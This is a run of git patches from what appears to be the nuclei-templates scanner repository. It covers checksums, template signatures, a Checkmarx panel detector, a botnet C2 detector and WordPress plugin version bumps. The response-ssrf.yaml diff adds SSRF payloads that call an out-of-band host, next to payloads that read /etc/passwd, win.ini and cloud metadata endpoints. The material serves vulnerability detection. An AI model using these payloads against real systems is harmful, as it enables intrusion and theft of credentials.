https://github.com/bigb0x/CVE-2024-40348 + classification: + epss-score: 0.00043 + epss-percentile: 0.09329 metadata: vendor: morpheus65535 product: bazarr From a2444caa074f96b24e7ce05d0ecade070a7a781f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 22 Jul 2024 15:04:07 +0530 Subject: [PATCH 1505/1841] Update CVE-2024-40348.yaml --- http/cves/2024/CVE-2024-40348.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index d89e06ac17..ab6c6d46c8 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -17,7 +17,7 @@ info: vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" - tags: bazarr,lfi + tags: cve,cve2024,bazarr,lfi flow: http(1) && http(2) From a15b8c7b10bd5c414e6ebd4965126ab3f5e5e9e7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 22 Jul 2024 09:59:28 +0000 Subject: [PATCH 1506/1841] Auto Generated New Template Addition List [Mon Jul 22 09:59:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc8e95a638..d310a86fd7 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +headless/2024/CVE-2024-38526.yaml http/cnvd/2023/CNVD-2023-72138.yaml http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-29204.yaml From ce68cfb81a6c2cc3a58981217b5e1d977ccc462c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 09:59:38 +0000 Subject: [PATCH 1507/1841] Auto Generated Templates Checksum [Mon Jul 22 09:59:38 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index db5a62cd88..8e7a61c463 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -244,7 +244,7 @@ dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 -dast/vulnerabilities/ssrf/blind-ssrf.yaml:062383a1480c443846d018fac5ec5d97773e8f75 +dast/vulnerabilities/ssrf/blind-ssrf.yaml:062d570ba1c6f5d5a382875b296b337c14f07aee dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 @@ -674,6 +674,7 @@ file/webshell/asp-webshell.yaml:3d5fd63aebe784dc4f49b04478b7fef5f4e9e2c2 file/webshell/jsp-webshell.yaml:2d750d74431e61570c7d96d5ffeb4353d3820a1d file/webshell/php-webshell.yaml:8465f2abe6a2b13a2f3ceaa3c277a7fdebdfaa41 file/xss/dom-invader-xss.yaml:9b911e2d4de98274f413c9a6a6689a4609c66eaa +headless/2024/CVE-2024-38526.yaml:316354870609900da82934d7fac7f4c8ee9b36e8 headless/cves/2018/CVE-2018-25031.yaml:d1b98330ac63ebee28a14fc633dafbf039ed6c48 headless/dvwa-headless-automatic-login.yaml:4c1f2437b541a83dfda0e1239995b08a0315e478 headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f @@ -4121,6 +4122,7 @@ http/exposed-panels/h2console-panel.yaml:6e82b0ef42df590b8821cd1426b523c2500e1fb http/exposed-panels/hadoop-exposure.yaml:bfca529fe512a140ebddad48a53520d26828a304 http/exposed-panels/haivision-gateway-panel.yaml:e3dc0e5ab37474032fd9076a6cd028e89b265f1b http/exposed-panels/haivision-media-platform-panel.yaml:3ec9207b4e891b6080b30c3fcee72ccdfaff36e7 +http/exposed-panels/hal-management-panel.yaml:8bb63d680703ac8da50bd72e293096917a8a24ef http/exposed-panels/hangfire-dashboard.yaml:dd2cef1642c3715d27adfacee1a32926de84fcee http/exposed-panels/harbor-panel.yaml:5f8ab6b28043fcb08bfd1b5c6d41b82995b0f3fa http/exposed-panels/hashicorp-consul-agent.yaml:3c36d773243e3c180d343ce0fb640fe12abb0ca2 @@ -8905,7 +8907,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:504de109984ad49ec465238524f7da1cd17c69d7 +templates-checksum.txt:c3c13736aae5a3abd885796dcd1d1f34f411e9b8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e9b102da3e1edab19b7ada27dc6920ff9270bf41 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 22 Jul 2024 10:00:15 +0000 Subject: [PATCH 1508/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 00d1cb4f08..f8b12d955f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'headless/2024/CVE-2024-38526.yaml' - 'http/cnvd/2023/CNVD-2023-72138.yaml' - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-29204.yaml' From df04445d5109a9914769eca085992b7658fac621 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 10:01:20 +0000 Subject: [PATCH 1509/1841] Auto Template Signing [Mon Jul 22 10:01:20 UTC 2024] :robot: --- headless/2024/CVE-2024-38526.yaml | 1 + http/exposed-panels/hal-management-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/headless/2024/CVE-2024-38526.yaml b/headless/2024/CVE-2024-38526.yaml index 53ebf0d9b0..75aef77682 100644 --- a/headless/2024/CVE-2024-38526.yaml +++ b/headless/2024/CVE-2024-38526.yaml @@ -60,3 +60,4 @@ headless: - "union.macoms.la" - "newcrbpc.com" part: urls +# digest: 4a0a004730450221008b738ec6c666368330687e6764dc2fcbf3c95a84d56a6899b655a191a14df157022007e079eb3a5924e73ce46bd10dc18a84a6fad8871ef0e58954377fe4f87fb47e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/hal-management-panel.yaml b/http/exposed-panels/hal-management-panel.yaml index 8b0d152f94..6936206d73 100644 --- a/http/exposed-panels/hal-management-panel.yaml +++ b/http/exposed-panels/hal-management-panel.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100f5f381a91a02c7d7689411b6e10bd5a54ca385861553a6df826cc496625b9c8002204dd8c8434a2e57c7159bc228546586eb8687bb40da8639bd8a8c0a526e98d461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2cba2ac444890268ccc6d99030a5ccdde29e8289 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 22 Jul 2024 16:19:11 +0330 Subject: [PATCH 1510/1841] Update response-ssrf.yaml --- dast/vulnerabilities/ssrf/response-ssrf.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index 1b6ab7b830..c2c4fc7e4c 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -2,7 +2,7 @@ id: response-ssrf info: name: Full Response SSRF Detection - author: pdteam,pwnhxl,j4vaovo + author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py @@ -20,7 +20,11 @@ http: ssrf: - 'http://{{interactsh-url}}' - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{FQDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{FQDN}}' - 'http://{{RDN}}.{{interactsh-url}}' + - 'http://{{RDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{RDN}}' - 'file:////./etc/./passwd' - 'file:///c:/./windows/./win.ini' - 'http://metadata.tencentyun.com/latest/meta-data/' @@ -128,4 +132,4 @@ http: part: body regex: - 'id[\s\S]+interfaces\/' -# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 From 22b2e5e3177a644a97ff292055dfda0f1cf3a399 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 22 Jul 2024 20:43:04 +0200 Subject: [PATCH 1511/1841] Update checkmarx-panel.yaml --- .../checkmk/checkmarx-panel.yaml | 30 ++++++++++++++----- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/http/exposed-panels/checkmk/checkmarx-panel.yaml b/http/exposed-panels/checkmk/checkmarx-panel.yaml index a3c61350ed..71b8b342bc 100644 --- a/http/exposed-panels/checkmk/checkmarx-panel.yaml +++ b/http/exposed-panels/checkmk/checkmarx-panel.yaml @@ -1,25 +1,39 @@ id: checkmarx-panel-detect info: - name: Checkmarx WebClient Login Panel - Detect - author: joanbono + name: Checkmarx Login Panel - Detect + author: joanbonon,righettod severity: info - description: Checkmarx WebClient login panel was detected. + description: Checkmarx login panel was detected. + reference: + - https://docs.checkmarx.com/en/34965-44074-checkmarx-sast.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,checkmarx + verified: true + shodan-query: http.html:"CxSASTManagerUri" + tags: panel,checkmarx,detect,login http: - method: GET path: + - "{{BaseURL}}/cxrestapi/help/system/version" - "{{BaseURL}}/cxwebclient/Login.aspx" + - "{{BaseURL}}/cxrestapi/auth/identity/.well-known/openid-configuration" + stop-at-first-match: true matchers: - - type: word - words: - - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "cxsastmanageruri", "cxauthorityconfigurations", "/cxwebclient/webapp/", "sast_api", "sast_rest_api" , "sast-permissions", "hotfix")' + condition: and + + extractors: + - type: regex part: body -# digest: 4a0a00473045022073859fd8e881a46904e753b8ac158d4bf504e86ac1ff4e60a5acb794053af8b0022100ef4b06e978f467ae8e190aaa645ebc973b774efa6c29b77423c91459063522c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + group: 1 + regex: + - '(?i)"version":\s*"([0-9.]+)"' From 93c431b1f76355faae99831b034f682b9bbe48a0 Mon Sep 17 00:00:00 2001 From: johnk3r <6247648+johnk3r@users.noreply.github.com> Date: Mon, 22 Jul 2024 16:57:46 -0300 Subject: [PATCH 1512/1841] Create 7777botnet.yaml --- network/c2/7777botnet.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 network/c2/7777botnet.yaml diff --git a/network/c2/7777botnet.yaml b/network/c2/7777botnet.yaml new file mode 100644 index 0000000000..e215fa2c2d --- /dev/null +++ b/network/c2/7777botnet.yaml @@ -0,0 +1,30 @@ +id: 7777botnet-detect + +info: + name: 7777-Botnet - Detect + author: johnk3r + severity: info + reference: + - https://gi7w0rm.medium.com/the-curious-case-of-the-7777-botnet-86e3464c3ffd + metadata: + verified: true + max-request: 1 + shodan-query: product:'hash:1357418825' + tags: network,c2,ir,osint,cti,darktrack,botnet,tcp + +tcp: + - inputs: + - data: "fffc01fffb1ffffa1f00500018fff0fffd01fffd03" + read: 2048 + + host: + - "{{Hostname}}" + port: 7777 + + matchers: + - type: word + part: data + words: + - "xlog" + - "in" + condition: and From 20581cb09fd94087397020156ec04848a229f493 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 00:20:01 +0000 Subject: [PATCH 1513/1841] Auto WordPress Plugins Update [Tue Jul 23 00:20:01 UTC 2024] :robot: --- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/litespeed-cache.txt | 2 +- helpers/wordpress/plugins/megamenu.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- .../wordpress/plugins/the-events-calendar.txt | 2 +- .../plugins/woocommerce-gateway-stripe.txt | 2 +- .../plugins/woocommerce-paypal-payments.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../technologies/wordpress/plugins/chaty.yaml | 1 - .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/copy-delete-posts.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluent-smtp.yaml | 48 +++++++++++++++++++ .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - .../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/hostinger.yaml | 1 - .../wordpress/plugins/image-optimization.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/jetpack-boost.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/metform.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../plugins/pinterest-for-woocommerce.yaml | 1 - .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../plugins/royal-elementor-addons.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../sticky-header-effects-for-elementor.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../wordpress/plugins/templately.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - .../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-legacy-rest-api.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 1 - ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-crontrol.yaml | 1 - .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../plugins/wp-reviews-plugin-for-google.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 1 - .../wordpress/plugins/wp-seopress.yaml | 1 - .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 56 insertions(+), 207 deletions(-) create mode 100644 http/technologies/wordpress/plugins/fluent-smtp.yaml diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 9b7a431d9f..448ada3bda 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.2.4 \ No newline at end of file +3.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index 11aab86760..1f2be2a26c 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -6.2.0.1 \ No newline at end of file +6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/megamenu.txt b/helpers/wordpress/plugins/megamenu.txt index 712bd5a680..5436ea06e3 100644 --- a/helpers/wordpress/plugins/megamenu.txt +++ b/helpers/wordpress/plugins/megamenu.txt @@ -1 +1 @@ -3.3.1 \ No newline at end of file +3.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index b916322161..5553d8c45a 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.8.6 \ No newline at end of file +3.8.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index fa09f584d7..cd802a1ec4 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.5.2 \ No newline at end of file +6.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt index e0741a834a..bd0b85a9b1 100644 --- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt +++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt @@ -1 +1 @@ -8.5.1 \ No newline at end of file +8.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 96d771776b..cae9add96b 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.8.1 \ No newline at end of file +2.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 385495e93e..94c6217715 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.9.1 \ No newline at end of file +14.9.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 31dac33e8e..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005ec4957081d3616091df87b63ef3316eee10ea6944ffe8512357b3b227b49a4022030ca82f2d399674351c0070d69c5cc2ab3297c39ced1e1745d22982ccf27e587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8c77ce6f5b..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220138c852e2ef9d9789f5260c7e129955d597b69dbc438af518a3b726bf4658dd402202422f24376d7dbf06d8baf1cf02e9f7446e36620b3c5970aad800a1c5fc9928f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4ed60f57b9..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bdaa18a62e72073d76093369131ccb32fc19ef777d2edc83ff886bbc3cf9365e0220426bbd54091baee627ae7eebbc83bf9e2ea0d10b000ed7e5895e927a2873c3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 564417d156..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220657e95868d71234a2138185c03b7de2ca60f6aaacf1a569e329070521cef6f83022100ec4c4ce88084787524cfd62cc77056907c64cb83bffdd22932aa3b42439cab54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 80e2eb8463..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 